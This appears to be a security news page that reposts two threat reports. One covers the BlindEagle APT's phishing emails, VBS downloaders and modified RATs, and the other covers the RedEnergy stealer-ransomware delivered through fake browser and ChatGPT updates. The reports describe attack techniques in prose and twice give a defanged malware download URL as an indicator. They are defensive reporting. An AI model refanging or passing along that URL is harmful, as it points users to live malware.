Joint integration delivers effective DSPM enforcement for self-managed customers starting with credential-free access, risk-based continuous authentication, and protection from data exposure.
Related Posts
CISA: Hackers abuse F5 BIG-IP cookies to map internal servers
CISA: Hackers abuse F5 BIG-IP cookies to map internal servers
CISA is warning that threat actors have been observed abusing unencrypted persistent F5 BIG-IP cookies to identify and target other internal devices on the targeted network. […] Read More
New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails
New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails
BlindEagle (APT-C-36) is a Latin American Advanced Persistent Threat group that has been active since 2018. It targets the governmental, financial, and energy sectors in Colombia, Ecuador, Chile, Panama, and other regional countries.
BlindEagle is known for employing straightforward yet impactful techniques; the group demonstrates versatility in switching between financially motivated attacks and espionage operations.
Cybersecurity researchers at Kaspersky Lab recently identified this new group, which was found to be attacking multiple organizations via weaponized emails.
APT Group BlindEagle Attacking Organizations
BlindEagle, an advanced threat actor, carries out multi-stage attacks, which start with phishing emails disguised as government and financial institutions.
Phishing impersonating the Attorney General’s Office (Source – Securelist)
To avoid detection, their campaigns apply geolocation-based filtering through URL shorteners so that they can only reach specific regions.
Free Webinar on Detecting & Blocking Supply Chain Attack -> Book your Spot
Typically, the initial infection vector is compressed files in different formats, including some less popular ones like LHA or UUE, which contain Visual Basic Scripts.
These scripts use WScript, XMLHTTP objects, or PowerShell to download further payloads from attacker-controlled servers or public platforms such as Pastebin or GitHub.
The group’s malware deployment advances through a number of stages incorporating encoded or obfuscated artifacts often exploiting steganography techniques and topping in modified open-source Remote Access Trojans (RATs).
Steganography used in a BlindEagle campaign (Source – Securelist)
It is possible to tell by the different RATs like njRAT, LimeRAT, BitRAT, and AsyncRAT that the group uses by frequently switching between them in line with specific campaigns’ goals such as stealing money via the internet or cyber espionage.
They use process injection techniques, mainly process hollowing, to avoid being detected where the last payload is executed on legitimate processes’ memory space.
The team modifies their RATs with improved information collection abilities, additional plugin installation features, and, in some cases, a special capability of intercepting bank account credentials developed, showing how they can fit them according to victims’ requirements or what exactly each campaign intends to achieve, reads the report.
BlindEagle was previously recognized as using simple tactics such as basic phishing and off-the-shelf malware. But more recently, the group has demonstrated more complex methods against its targets.
In May 2023, they conducted a campaign that included artifacts with Portuguese language characteristics and employed Brazilian image-hosting sites, possibly showing cooperation with other groups.
In the following month, there was an attack in June where the DLL sideloading technique was used, and HijackLoader, a new modular malware loader, was unleashed.
TTPs
Here below we have mentioned all the TTPs:-
Phishing
Malicious Attachments
URL Shorteners
Dynamic DNS
Public Infrastructure
Process Hollowing
VBS Scripts/.NET Assemblies
Open-source RATs
Phishing emails purporting to be from Colombian judicial institutions start these attacks with malicious PDF or DOCX attachments containing files that appear legitimate but trick victims into downloading and running them.
While Colombia remains an important destination for them, with 87% of victims located there, BlindEagle also operates in Ecuador, Chile, and Panama.
Various areas, including government, education, health, and transport, are affected by their campaigns.BlindEagle continues to represent a serious threat in the area through its repeated implementation of cyber-espionage as well as financial credential theft campaigns.
Are you from SOC and DFIR Teams? Analyse Malware Incidents & get live Access with ANY.RUN -> Get 14 Days Free Acces
The post New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails appeared first on Cyber Security News.
New Stealer-as-a-Ransomware Delivered Through Fake Updates
New Stealer-as-a-Ransomware Delivered Through Fake Updates
Recently, the cybersecurity analysts at Zscaler found a new variant of malware, RedEnergy, a new hybrid Stealer-as-a-Ransomware threat.
RedEnergy stealer targets industries through fake updates, stealing data from browsers, exfiltrating sensitive information, and utilizing ransomware modules.
The most recent detection of the RedEnergy stealer unveils a powerful blend of stealthy data theft and encryption designed to cause extensive harm and establish complete control over its targets.
It targets multiple industries, and here below, we have mentioned them:-
Energy utilities
Oil
Gas
Telecom
Machinery
Using a deceptive FAKEUPDATES campaign, the Stealer-as-a-Ransomware variant lures targets into updating their browsers promptly.
After infiltrating the system, this malicious variant extracts data and encrypts files, leaving victims at risk of data loss, exposure, or sale of valuable information.
Stealer-as-a-Ransomware Campaign Analysis
Zscaler found a RedEnergy stealer targeting the Philippines Industrial Machinery Manufacturing Company and other industries with prominent LinkedIn pages.
Essential company info and website links on these pages lure cybercriminals and the deceptive redirection technique used in this threat campaign.
Users visiting the targeted company’s website from LinkedIn get redirected to a malicious site.
They’re tricked into installing a fake browser update disguised as four different browser icons, and instead, they unwittingly download the RedStealer executable file.
browser Extensions showcased
Regardless of the browser icon clicked, users are redirected to the following address:-
www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe
While this URL mainly triggers the download of a component of the malicious payload, which is “setupbrowser.exe.”
Malicious URL
The threat campaign employs a deceptive download domain, www[.]igrejaatos2[.]org, pretending to be a “ChatGPT” site.
This site tricks the victims and makes them download the fake offline version of the “ChatGPT.”
Now here, at this point, the victims obtain the same malicious executable disguised as the ChatGpt zip file.
Fake ChatGPT
Apart from finding the threat campaign against the Philippines Industrial Machinery Manufacturing Company, Zscaler’s extensive search revealed other FAKEUPDATES campaigns.
These campaigns share traits and techniques, suggesting a coordinated cybercriminal effort.
A campaign impersonating a major Brazilian telecom company does the same as the previous one. Victims are directed to the same webpage and then download the exact executable file from:-
www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe
This observation suggests that attackers commonly employ the practice of reusing infrastructure and tactics, intending to generate larger effects and increase profits.
Malware Infection chain
The investigated RedEnergy malware has dual functionality:-
Stealer
To avoid detection and make analysis more challenging, the author of this malware deliberately obfuscates the sophisticated .NET file.
Using HTTPS, the malware establishes encrypted and obfuscated communication with command and control servers, resulting in improved encryption and obfuscation techniques.
Attack Chain
While the complete infection chain involves three different stages, and here they are mentioned below:-
Stage 1: Initial Startup
Stage 2: Dropping Files, Persistence, Outgoing Requests, Encrypted Files
Stage 3: Decryption Routine
The final payload of the infection chain drops the ransom note that is dubbed “read_it.txt.” While this note is left by the threat actors in all the encrypted folders, informing users of the ransom required for file release.
ransom Note
Based on the Zscaler analysis, it is clear that industries and organizations are confronted with constantly evolving and highly sophisticated cyber threats.
Trustifi AI-based email security Solution protecting business emails from advanced email threats: Tracking, Blocking, Modifying Clean Mail Box, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware.
To mitigate the impact, it is essential to have strong security measures in place, ensure user awareness, and respond promptly to incidents.
Through constant vigilance and implementing cybersecurity strategies, businesses can shield valuable data from such malicious campaigns.
Manage and secure Your Endpoints Efficiently – Free Download
The post New Stealer-as-a-Ransomware Delivered Through Fake Updates appeared first on Cyber Security News.
Cyber Security News